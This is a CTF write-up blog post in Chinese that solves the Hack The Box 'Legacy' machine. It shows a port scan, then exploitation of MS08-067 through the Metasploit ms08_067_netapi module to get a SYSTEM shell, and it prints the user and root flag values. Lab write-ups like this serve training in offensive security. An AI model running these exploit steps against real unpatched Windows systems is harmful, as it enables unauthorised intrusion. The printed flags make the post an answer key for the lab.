首页 > 其他分享 >HTB:Legacy[WriteUP]

HTB:Legacy[WriteUP]

时间:2024-10-13 18:20:23浏览次数:3  
标签:What execution HTB 067 WriteUP Legacy IP 2008 CVE

目录

连接至HTB服务器并启动靶机

1.How many TCP ports are open on Legacy?

2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?

3.What is the name of the Metasploit module that exploits CVE-2008-4250?

4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.

5.Submit the flag located on the john user's desktop.

USER_FLAG:e69af0e4f443de7e36876fda4ec7644f

6.Submit the flag located on the administrator's desktop.

ROOT_FLAG:993442d258b0e0ec917cae9e695d5713

7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?


连接至HTB服务器并启动靶机

靶机IP:10.10.10.4

分配IP:10.10.16.7


1.How many TCP ports are open on Legacy?

使用fscan对靶机进行端口扫描:

fscan -nopoc -nobr -no -h {TARGET_IP}

由fscan扫描结果可见,靶机开放端口:135、139、445 共3个端口


2.What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution?

根据Google搜索可知:CVE-2008-4250(MS08-067)

注:其实这一题的答案在下一道题的题目上就有


3.What is the name of the Metasploit module that exploits CVE-2008-4250?

启动metasploit:

msfconsole

对CVE-2008-4250漏洞模块进行搜索:

search cve:CVE-2008-4250

所以利用该漏洞的模块名为:ms08_067_netapi


4.When exploiting MS08-067, what user does execution run as? Include the information before and after the.

使用该模块:

use exploit/windows/smb/ms08_067_netapi

设置靶机IP:

set rhosts {TARGET_IP}

设置分配IP:

set lhost {NATIVE_IP}

漏洞利用:

exploit

查看当前用户名:

getuid

当前登录服务器的用户名为:NT AUTHORITY\SYSTEM


5.Submit the flag located on the john user's desktop.

启动cmd:

shell

进入john用户的桌面:

cd C:\Documents and Settings\john\Desktop

查看user.txt文件内容:

type user.txt

USER_FLAG:e69af0e4f443de7e36876fda4ec7644f


6.Submit the flag located on the administrator's desktop.

进入Administrator用户的桌面:

cd C:\Documents and Settings\Administrator\Desktop

查看root.txt文件内容:

type root.txt

ROOT_FLAG:993442d258b0e0ec917cae9e695d5713


7.In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID?

这里说的是MS17-010漏洞,直接上百度或者谷歌查一下它的CVE编号即可:

MS17-010远程溢出漏洞- 永恒之蓝:CVE-2017-0143

标签:What,execution,HTB,067,WriteUP,Legacy,IP,2008,CVE
From: https://blog.csdn.net/qq_43007452/article/details/142891261

相关文章

  • NewStar CTF[pwn] overwrite WriteUp
    IDA打开,查看func()函数,得到以下代码点击查看代码unsigned__int64func(){size_tinput1[6];//[rsp+Ch][rbp-84h]BYREFcharnptr[72];//[rsp+40h][rbp-50h]BYREFunsigned__int64v3;//[rsp+88h][rbp-8h]v3=__readfsqword(0x28u);printf("plsin......
  • HTB buff wp
    难度:easy初步端口扫描:开了两个端口,7680没有什么信息,8080是web服务,进去看一下,在concat.php发现版本信息searchsploit搜一下,发现payload,选用48506这个脚本修改一下脚本,不用他给的交互式shell(太难用了),在写入的php文件中加入文件上传功能,弹回来个shell,用msf收一下直接用mu......
  • jarvisoj_level2_x64 1 writeup and blog
    Hereifinishthejarvisoj_level2_x641challengeinbuuctfandhereissomewriteup......
  • NewStarCtf 2024第一周writeup
    有几道题没写出来,但还是希望能够帮到大家理解更多的CTF知识Signin操作内容:做选择题得出flag。flag值:flag{I_Agr3e_to_FoL10w_th3_ru1es_c41fa97d}MISC兑换码操作内容:题目提示flag在图片下方,010修改图片宽度,得到flag。flag值:flag{La_vaguelette}MISCLabyrinth操......
  • HTB-TwoMillion 靶机笔记
    TwoMillion靶机笔记概述HTB上的一台liunx靶机,难度定为了简单级别,它包括了对js接口的信息收集,js反混淆,未授权,越权,命令注入等漏洞。一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oports10.10.11.221Nmapscanreportfor10.10.11.221Hostisup(0.37s......
  • 【极客大挑战2023】- Re -点击就送的逆向题 WriteUp
    这道题给了一个.s文件解决方案有两个:1.利用gcc编译成可执行文件,然后反编译生成伪代码2.直接分析汇编(我不会。。。)1.利用gcc编译成可执行文件linux执行gcc-o1.s1IDA打开,分析并编写,注意一定要在字符串末尾加上\0结束符!!!点击查看代码#include<stdio.h>intmain(void){......
  • 【极客大挑战2023】RE方向 WriteUp
    1.砍树下载题目得到一个apk文件,jadx打开,查看Android.Manifest.xml查看MainActivity发现使用了一个I0o0I处理了输入和Syclover,猜测应该是对text处理后与Syclover对比,当result赋值为1就成功了。故查看I0o0I发现I0o0I再so文件中,故查看libezreeeee.so文件IDA打开,查找I0o0I生......
  • 极客大挑战2023-pwn-nc_pwntools WriteUp
    主要考查点Pwntools工具的基本使用方法解题思路1.nc连接题目,得到提示:根据题目,要求发送一个100长度的字符串,而且末尾需要为Sycloverb'A'*92+b'Syclover'2.发送第一个请求后进入第二步要求短时间内计算一个复杂算式,自己算是肯定不可能的,所以pwntools的recv来接收并完成......
  • 【CTF Web】Pikachu 反射型xss(get) Writeup(反射型XSS+GET请求)
    XSS(跨站脚本)概述Cross-SiteScripting简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASPTOP10的排名中一直属于前三的江湖地位......
  • 【CTF Web】BUUCTF SQLi-LABS Page-1(Basic Challenges) Less-12 Writeup(SQL注入+POST
    sqli-labs1点击启动靶机。SQLi-LABSPage-1(BasicChallenges)解法随便提交一些数据。审查元素。<formaction=""name="form1"method="post"> <divstyle="margin-top:15px;height:30px;">Username:&nbsp;&nbsp;&......